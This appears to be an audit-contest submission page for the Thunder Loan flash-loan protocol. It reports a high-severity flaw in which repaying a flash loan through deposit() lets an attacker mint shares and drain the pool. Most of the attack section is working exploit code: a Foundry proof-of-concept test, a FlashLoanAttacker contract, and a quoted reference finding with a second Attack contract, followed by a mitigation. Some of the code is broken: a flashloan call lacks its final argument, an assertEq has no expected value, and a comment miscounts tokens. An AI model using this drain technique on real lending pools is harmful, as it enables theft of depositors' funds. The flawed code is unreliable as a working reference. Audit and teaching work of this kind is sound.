Thunder Loan

AI First Flight #7

Beginner FriendlyFoundryDeFiOracle

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

A user holding only a minimal amount of the underlying token can drain all the liquidity from its assetToken contract

eliab256

Root + Impact

Description

Borrower who take flashLoan must repay the loaned amount plus a fee within the same transaction using repay function. This is verified by an ending balance check.
In this case, a user with a minimal amount of tokens can take out a flash loan. Instead of using repay, they use deposit so that the final balance assertion passes, but in addition, they receive the LP tokens. Once the flash loan is closed, the user can redeem the received LP tokens and effectively steal the underlying asset.

function flashloan(

address receiverAddress,

IERC20 token,

uint256 amount,

bytes calldata params

) external {

AssetToken assetToken = s_tokenToAssetToken[token];

uint256 startingBalance = IERC20(token).balanceOf(address(assetToken));

if (amount > startingBalance) {

revert ThunderLoan__NotEnoughTokenBalance(startingBalance, amount);

}

if (!receiverAddress.isContract()) {

revert ThunderLoan__CallerIsNotContract();

}

uint256 fee = getCalculatedFee(token, amount);

// slither-disable-next-line reentrancy-vulnerabilities-2 reentrancy-vulnerabilities-3

assetToken.updateExchangeRate(fee);

emit FlashLoan(receiverAddress, token, amount, fee, params);

s_currentlyFlashLoaning[token] = true;

assetToken.transferUnderlyingTo(receiverAddress, amount);

// slither-disable-next-line unused-return reentrancy-vulnerabilities-2

receiverAddress.functionCall(

abi.encodeWithSignature(

"executeOperation(address,uint256,uint256,address,bytes)",

address(token),

amount,

fee,

msg.sender,

params

)

);

uint256 endingBalance = token.balanceOf(address(assetToken));

// @audit-issue here I can use deposit insted of repay and pass the check stealing tokens

@> if (endingBalance < startingBalance + fee) {

revert ThunderLoan__NotPaidBack(

startingBalance + fee,

endingBalance

);

}

s_currentlyFlashLoaning[token] = false;

}

Risk

Likelihood:

Everytime a user has a little amount of token to pay flashLoan fees

Impact:

User can drain all the underliyng token liquidity from AssetToken contract

Proof of Concept

Test

The test sets up a pool with 100,000 tokens deposited by a legitimate LP, then funds the attacker contract with 10 tokens to cover the initial fee. The attacker calls attack() twice: the first time borrowing the maximum amount allowed by its balance, and the second time borrowing the entire remaining pool balance — which is now larger because the first attack left tokens behind. After both attacks, all underlying tokens are transferred to the attacker's EOA. The final assertion verifies that the attacker ends up with more tokens than it started with, confirming the drain.

contract POCtest is Test {

ThunderLoan thunderLoanImplementation;

MockPoolFactory mockPoolFactory;

ERC1967Proxy proxy;

ThunderLoan thunderLoan;

ERC20Mock weth;

ERC20Mock tokenA;

ERC20Mock tokenB;

ERC20Mock6Decimals tokenWith6Decimals;

AssetToken assetToken6Decimals;

AssetToken assetTokenA;

AssetToken assetTokenB;

address depositer = makeAddr("depositer");

address flahLoanReceiver = makeAddr("flashLoanReceiver");

address flashLoanAttacker = makeAddr("flashLoanAttacker");

function setUp() public virtual {

thunderLoan = new ThunderLoan();

mockPoolFactory = new MockPoolFactory();

weth = new ERC20Mock();

tokenA = new ERC20Mock();

tokenB = new ERC20Mock();

tokenWith6Decimals = new ERC20Mock6Decimals();

mockPoolFactory.createPool(address(tokenA));

mockPoolFactory.createPool(address(tokenWith6Decimals));

proxy = new ERC1967Proxy(address(thunderLoan), "");

thunderLoan = ThunderLoan(address(proxy));

thunderLoan.initialize(address(mockPoolFactory));

assetTokenB = thunderLoan.setAllowedToken(

IERC20(address(tokenB)),

true

);

assetToken6Decimals = thunderLoan.setAllowedToken(

IERC20(address(tokenWith6Decimals)),

true

);

tokenA.mint(depositer, 50000 * 10 ** tokenA.decimals()); //fund depositer with tokenA

//fund depositer with token with 6 decimals

tokenWith6Decimals.mint(

depositer,

5000 * 10 ** tokenWith6Decimals.decimals()

); // 5000 tokens in 6-decimal representation

}

function testUserCanDrainAllLiquidityUsingFlashLoanAndDeposit() public {

// This test use Basetest.t.sol setup

tokenA.mint(depositer, 50000 * 10 ** tokenA.decimals()); //fund depositer with tokenA

assetTokenA = thunderLoan.setAllowedToken(

IERC20(address(tokenA)),

true

);

// AssetTokenA has 0 tokenA deposited, now depositer will deposit TokenA and allows flashLoan

vm.startPrank(depositer);

uint256 depositAmount = tokenA.balanceOf(depositer);

tokenA.approve(address(thunderLoan), depositAmount);

thunderLoan.deposit(tokenA, depositAmount);

vm.stopPrank();

//INITIAL STATE

uint256 assetTokenAInitialBalance = tokenA.balanceOf(

address(assetTokenA)

); //50000 tokens

uint256 initialAttackerBalance = 10 * 10 ** tokenA.decimals(); //100 tokens

address underlying = address(tokenA);

vm.startPrank(flashLoanAttacker);

tokenA.mint(flashLoanAttacker, initialAttackerBalance); // fund attacker with tokenA to pay fee

//deploy and fund attacker contract, then execute attack

FlashLoanAttacker attackerContract = new FlashLoanAttacker(

address(thunderLoan)

);

tokenA.transfer(address(attackerContract), initialAttackerBalance); //used to pay fees first time

//INITAL STATE CONSOLELOGS

console2.log("--------initial state before flashloan--------");

console2.log(

"initial token balance of AssetToken: ",

assetTokenAInitialBalance

);

console2.log(

"Attacker contract initial balance: ",

IERC20(underlying).balanceOf(address(attackerContract))

);

console2.log("---------------------------------------------");

attackerContract.attack(underlying);

attackerContract.sendAllUnderlyingToAttacker(underlying); // transfer all tokenA from attacker contract to attacker EOA

vm.stopPrank();

console2.log("--------final state after attack--------");

console2.log(

"final token balance of AssetToken: ",

tokenA.balanceOf(address(assetTokenA))

);

console2.log(

"AttackerContract final balance: ",

IERC20(underlying).balanceOf(address(attackerContract))

);

console2.log(

"attacker final balance: ",

IERC20(underlying).balanceOf(flashLoanAttacker)

);

console2.log("---------------------------------------------");

assertGt(

tokenA.balanceOf(flashLoanAttacker),

initialAttackerBalance,

"Attacker should have more tokens after the attack"

);

assertEq(

tokenA.balanceOf(address(assetTokenA)),

"AssetToken should have 0 tokens after the attack"

);

}}

Attacker Contract

The core of the exploit lives in executeOperation: instead of calling repay(), the attacker calls deposit(amount + fee), which satisfies the ending balance check in flashloan() while simultaneously receiving AssetToken shares. The key insight is that by the time redeem() is called after the flash loan closes, the exchange rate has been inflated twice — once by flashloan() before the fee was received, and once by deposit() during the callback. The attacker redeems shares at this doubly-inflated rate, extracting more underlying tokens than it deposited and leaving the LP pool with a deficit.

contract FlashLoanAttacker {

ThunderLoan private immutable i_thunderLoan;

constructor(address thunderLoan) {

i_thunderLoan = ThunderLoan(thunderLoan);

}

//amount 1

function attack(address _underlyingToken) external {

console2.log("--------starting attack--------");

AssetToken assetToken = i_thunderLoan.s_tokenToAssetToken(

IERC20(_underlyingToken)

);

uint256 attackerBalance = IERC20(_underlyingToken).balanceOf(

address(this)

);

uint256 poolBalance = IERC20(_underlyingToken).balanceOf(

address(assetToken)

);

// max amount the attacker can borrow given its balance to pay the fee

uint256 maxAmount = (attackerBalance *

i_thunderLoan.getFeePrecision()) / i_thunderLoan.getFee();

// cap to pool balance to avoid revert for not enough liquidity

uint256 flashLoanAmount = maxAmount > poolBalance

? poolBalance

: maxAmount;

i_thunderLoan.flashloan(

address(this),

IERC20(_underlyingToken),

flashLoanAmount,

);

uint256 currentPoolBalance = IERC20(_underlyingToken).balanceOf(

address(assetToken)

);

uint256 currentRate = assetToken.getExchangeRate();

uint256 maxRedeemableShares = (currentPoolBalance *

assetToken.EXCHANGE_RATE_PRECISION()) / currentRate;

uint256 myShares = assetToken.balanceOf(address(this));

uint256 redeemAmount = myShares < maxRedeemableShares

? myShares

: maxRedeemableShares;

i_thunderLoan.redeem(IERC20(_underlyingToken), redeemAmount);

//attack completed, Attacker has "clean" underlying tokens in its balance, without any trace of flashLoan in the history of transactions

}

function sendAllUnderlyingToAttacker(address _underlyingToken) external {

uint256 amount = IERC20(_underlyingToken).balanceOf(address(this));

IERC20(_underlyingToken).transfer(msg.sender, amount);

}

// to complete the attack, attacker need fee amount of token in its balance, then will use stolen tokens

function executeOperation(

address token,

uint256 amount,

uint256 fee,

address initiator,

bytes calldata params

) external {

IERC20(token).approve(address(i_thunderLoan), amount + fee);

i_thunderLoan.deposit(IERC20(token), amount + fee);

//Now Atacker has asset tokens ready to be redeemed after flashLoan execution

}

Recommended Mitigation

To prevent this type of attack, it is possible to verify inside deposit() that the token being deposited is not currently being flash loaned, by checking the s_currentlyFlashLoaning mapping and reverting if the token is active in an ongoing flash loan. Using reentrancyGuard with non reentrant modifier on external and public function is also a good shield against this attack

function deposit(

IERC20 token,

uint256 amount

) external revertIfZero(amount) revertIfNotAllowedToken(token) {

+ if (s_currentlyFlashLoaning[token]) {

+ revert ThunderLoan__CurrentlyFlashLoaning();

+ }

AssetToken assetToken = s_tokenToAssetToken[token];

uint256 exchangeRate = assetToken.getExchangeRate();

uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) /

exchangeRate;

emit Deposit(msg.sender, token, amount);

assetToken.mint(msg.sender, mintAmount);

uint256 calculatedFee = getCalculatedFee(token, amount);

assetToken.updateExchangeRate(calculatedFee);

token.safeTransferFrom(msg.sender, address(assetToken), amount);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-04] All the funds can be stolen if the flash loan is returned using deposit()

## Description An attacker can acquire a flash loan and deposit funds directly into the contract using the **`deposit()`**, enabling stealing all the funds. ## Vulnerability Details The **`flashloan()`** performs a crucial balance check to ensure that the ending balance, after the flash loan, exceeds the initial balance, accounting for any borrower fees. This verification is achieved by comparing **`endingBalance`** with **`startingBalance + fee`**. However, a vulnerability emerges when calculating endingBalance using **`token.balanceOf(address(assetToken))`**. Exploiting this vulnerability, an attacker can return the flash loan using the **`deposit()`** instead of **`repay()`**. This action allows the attacker to mint **`AssetToken`** and subsequently redeem it using **`redeem()`**. What makes this possible is the apparent increase in the Asset contract's balance, even though it resulted from the use of the incorrect function. Consequently, the flash loan doesn't trigger a revert. ## POC To execute the test successfully, please complete the following steps: 1. Place the **`attack.sol`** file within the mocks folder. 1. Import the contract in **`ThunderLoanTest.t.sol`**. 1. Add **`testattack()`** function in **`ThunderLoanTest.t.sol`**. 1. Change the **`setUp()`** function in **`ThunderLoanTest.t.sol`**. ```Solidity import { Attack } from "../mocks/attack.sol"; ``` ```Solidity function testattack() public setAllowedToken hasDeposits { uint256 amountToBorrow = AMOUNT * 10; vm.startPrank(user); tokenA.mint(address(attack), AMOUNT); thunderLoan.flashloan(address(attack), tokenA, amountToBorrow, ""); attack.sendAssetToken(address(thunderLoan.getAssetFromToken(tokenA))); thunderLoan.redeem(tokenA, type(uint256).max); vm.stopPrank(); assertLt(tokenA.balanceOf(address(thunderLoan.getAssetFromToken(tokenA))), DEPOSIT_AMOUNT); } ``` ```Solidity function setUp() public override { super.setUp(); vm.prank(user); mockFlashLoanReceiver = new MockFlashLoanReceiver(address(thunderLoan)); vm.prank(user); attack = new Attack(address(thunderLoan)); } ``` attack.sol ```Solidity // SPDX-License-Identifier: MIT pragma solidity 0.8.20; import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import { SafeERC20 } from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; import { IFlashLoanReceiver } from "../../src/interfaces/IFlashLoanReceiver.sol"; interface IThunderLoan { function repay(address token, uint256 amount) external; function deposit(IERC20 token, uint256 amount) external; function getAssetFromToken(IERC20 token) external; } contract Attack { error MockFlashLoanReceiver__onlyOwner(); error MockFlashLoanReceiver__onlyThunderLoan(); using SafeERC20 for IERC20; address s_owner; address s_thunderLoan; uint256 s_balanceDuringFlashLoan; uint256 s_balanceAfterFlashLoan; constructor(address thunderLoan) { s_owner = msg.sender; s_thunderLoan = thunderLoan; s_balanceDuringFlashLoan = 0; } function executeOperation( address token, uint256 amount, uint256 fee, address initiator, bytes calldata /* params */ ) external returns (bool) { s_balanceDuringFlashLoan = IERC20(token).balanceOf(address(this)); if (initiator != s_owner) { revert MockFlashLoanReceiver__onlyOwner(); } if (msg.sender != s_thunderLoan) { revert MockFlashLoanReceiver__onlyThunderLoan(); } IERC20(token).approve(s_thunderLoan, amount + fee); IThunderLoan(s_thunderLoan).deposit(IERC20(token), amount + fee); s_balanceAfterFlashLoan = IERC20(token).balanceOf(address(this)); return true; } function getbalanceDuring() external view returns (uint256) { return s_balanceDuringFlashLoan; } function getBalanceAfter() external view returns (uint256) { return s_balanceAfterFlashLoan; } function sendAssetToken(address assetToken) public { IERC20(assetToken).transfer(msg.sender, IERC20(assetToken).balanceOf(address(this))); } } ``` Notice that the **`assetLt()`** checks whether the balance of the AssetToken contract is less than the **`DEPOSIT_AMOUNT`**, which represents the initial balance. The contract balance should never decrease after a flash loan, it should always be higher. ## Impact All the funds of the AssetContract can be stolen. ## Recommendations Add a check in **`deposit()`** to make it impossible to use it in the same block of the flash loan. For example registring the block.number in a variable in **`flashloan()`** and checking it in **`deposit()`**.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!